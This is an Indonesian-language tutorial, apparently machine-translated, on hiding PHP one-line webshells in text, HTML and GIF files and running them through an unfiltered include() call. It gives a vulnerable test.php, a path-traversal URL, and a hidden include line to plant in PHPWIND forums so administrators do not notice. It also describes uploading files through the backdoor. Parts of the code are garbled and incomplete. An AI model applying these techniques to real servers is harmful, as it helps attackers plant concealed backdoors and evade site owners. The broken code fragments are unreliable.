Baru-baru ini, banyak teman yang bertanya kepada saya apakah saya bisa menyembunyikan Trojan satu kalimat saya dalam HTML atau gambar. Faktanya, memasukkan Trojan satu kalimat ke dalam file PHP sudah sangat tersembunyi. Mari lanjutkan membaca laporan pengujian ini. Perlu Anda ketahui bahwa jika Anda hanya memasukkan pernyataan PHP ke dalam gambar, maka tidak akan dieksekusi pula, karena PHP hanya mem-parsing file yang berekstensi php. Oleh karena itu, diperlukan kemampuan untuk mengeksekusi pernyataan PHP yang tersembunyi di dalam gambar. Kami hanya menggunakan fungsi pemanggilan di PHP: include, require, dll.
Kita masih ingat artikel tentang menyembunyikan Trojan di gambar beberapa hari lalu. Artinya, gunakan pernyataan seperti include("x.gif") di file PHP untuk memanggil pernyataan Trojan horse yang tersembunyi di dalam gambar. Pernyataan di ASP serupa. Kelihatannya sangat tersembunyi, namun jika memanggil gambar tersebut secara langsung, tidak akan sulit bagi seseorang yang mengetahui sedikit tentang PHP untuk menemukan sesuatu yang mencurigakan. Karena sulitnya melewatkan parameter menggunakan metode GET di URL, kinerja penyisipan Trojan tidak dapat dimanfaatkan sepenuhnya.
Fungsi Sertakan sering digunakan di PHP, sehingga menyebabkan terlalu banyak masalah keamanan. Misalnya, kerentanan PHPWIND1.36 disebabkan oleh kurangnya pemfilteran variabel di belakang penyertaan. Dari sini kita dapat membuat pernyataan serupa untuk dimasukkan ke dalam file PHP. Kemudian sembunyikan Trojan tersebut pada gambar atau file HTML yang bisa dikatakan lebih tersembunyi. Misalnya, masukkan pernyataan berikut di forum PHPWIND: < ''?@include includ/.$PHPWIND_ROOT;? >Administrator umum tidak dapat melihatnya.
Dengan bantuan fungsi include, kita dapat menyembunyikan Trojan PHP di berbagai jenis file seperti file txt, html, dan gambar. Karena ketiga jenis file ini, file txt, html, dan gambar, adalah yang paling umum di forum dan sistem artikel, kami akan melakukan pengujian secara berurutan di bawah.
Pertama buat file PHP test.php. Isi filenya adalah:
$test=$_GET['test'];
@include 'test/'.$
test
;
Trojan satu kalimat Tidak apa-apa untuk membuka file deskripsi direktori. Cukup buat file TXT t.txt. Kami menempelkan Trojan satu kalimat ke dalam file t.txt. Kemudian kunjungi http://localhost/test/test.php?test=../t.txt. Jika Anda melihat konten t.txt, tidak apa-apa. Kemudian tambahkan alamat Trojan klien backdoor mini PHP ke http Just tambahkan cmd ke kata sandi ://localhost/test/test.php?test=../t.txt , dan Anda dapat melihat hasil yang dikembalikan oleh eksekusi.
Untuk file HTML, umumnya merupakan file template. Untuk mengaktifkan kuda Trojan yang dimasukkan ke dalam file HTML untuk dipanggil dan dieksekusi tanpa ditampilkan, kita dapat menambahkan kotak teks dengan atribut tersembunyi di HTML, seperti: Kemudian gunakan metode yang sama seperti di atas. Hasil kembali eksekusi umumnya dapat dilihat dengan melihat file sumber. Misalnya, gunakan fungsi melihat direktori program ini. Melihat konten file sumber, saya bisa mendapatkan direktori sebagai C:Uniserver2_7swwwtest.
Sekarang mari kita bicara tentang file gambar. Trik paling beracun adalah menyembunyikan kuda Troya di dalam gambar. Kita bisa langsung mengedit gambar dan menyisipkannya di akhir gambar.
Setelah pengujian, umumnya tidak akan mempengaruhi gambar. Kemudian tambahkan alamat Trojan klien dengan cara yang sama
dan kami memeriksa variabel lingkungan PHP. Hasil yang dikembalikan adalah gambar asli.
Mungkin ada beberapa perbedaan antara hasil di sini dan apa yang kita bayangkan. Sebenarnya perintah telah dijalankan, tetapi hasil yang dikembalikan tidak dapat dilihat. Karena ini adalah file GIF asli, hasil yang dikembalikan tidak akan ditampilkan buktikan apakah benar-benar dijalankan. Setelah menerima perintah, kita jalankan perintah unggah file. Seperti yang diharapkan, file telah berhasil diunggah ke server. Keuntungan dari pemalsuan tersebut adalah bahwa hal itu disembunyikan dengan baik. Tentu saja, kerugiannya adalah tidak ada tanggapan. Jika Anda ingin melihat hasilnya, keluarkan Notepad dan buat file gambar palsu.
Pada titik ini, tes pada dasarnya selesai. Cara menyembunyikan backdoor PHP tergantung pada pilihan Anda sendiri. Penulisannya terburu-buru, jika ada yang salah mohon tunjukkan!